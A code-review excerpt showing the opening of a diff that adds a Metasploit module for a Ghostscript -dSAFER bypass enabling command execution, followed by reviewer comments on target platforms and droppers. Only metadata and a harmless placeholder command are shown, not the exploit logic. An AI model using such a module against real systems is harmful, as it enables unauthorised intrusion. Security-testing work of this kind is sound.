modules/exploits/multi/fileformat/ghostscript_failed_restore.rb

```diff
@@ -0,0 +1,77 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+  Rank = ExcellentRanking
+
+  PLACEHOLDER_STRING  = 'metasploit'
+  PLACEHOLDER_COMMAND = 'echo vulnerable > /dev/tty'
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ghostscript Failed Restore Command Execution',
+      'Description'    => %q{
+        This module exploits a -dSAFER bypass in Ghostscript to execute
+        arbitrary commands by handling a failed restore (grestore) in
+        PostScript to disable LockSafetyParams and avoid invalidaccess.
+      },
+      'Author'         => [
+        'Tavis Ormandy', # Vuln discovery and exploit
+        'wvu'            # Metasploit module
+      ],
+      'References'     => [
+        ['URL', 'http://seclists.org/oss-sec/2018/q3/142'],
+        ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1640']
+      ],
+      'DisclosureDate' => 'Aug 21 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix', 'win'],
```

Comment:
I may be completely ignorant, but I thought the cool thing about this was that it worked out of the box on a bunch of linux distros?

Reply:
`unix` is a bit of a catch-all for Unix-like systems. Specifically, it enables access to the `cmd/unix` payloads we need. I'm sorry it isn't very clear.

Reply:
And since this is a file format exploit, we'd want a one-shot dropper. That can be done to enable `linux` as a platform.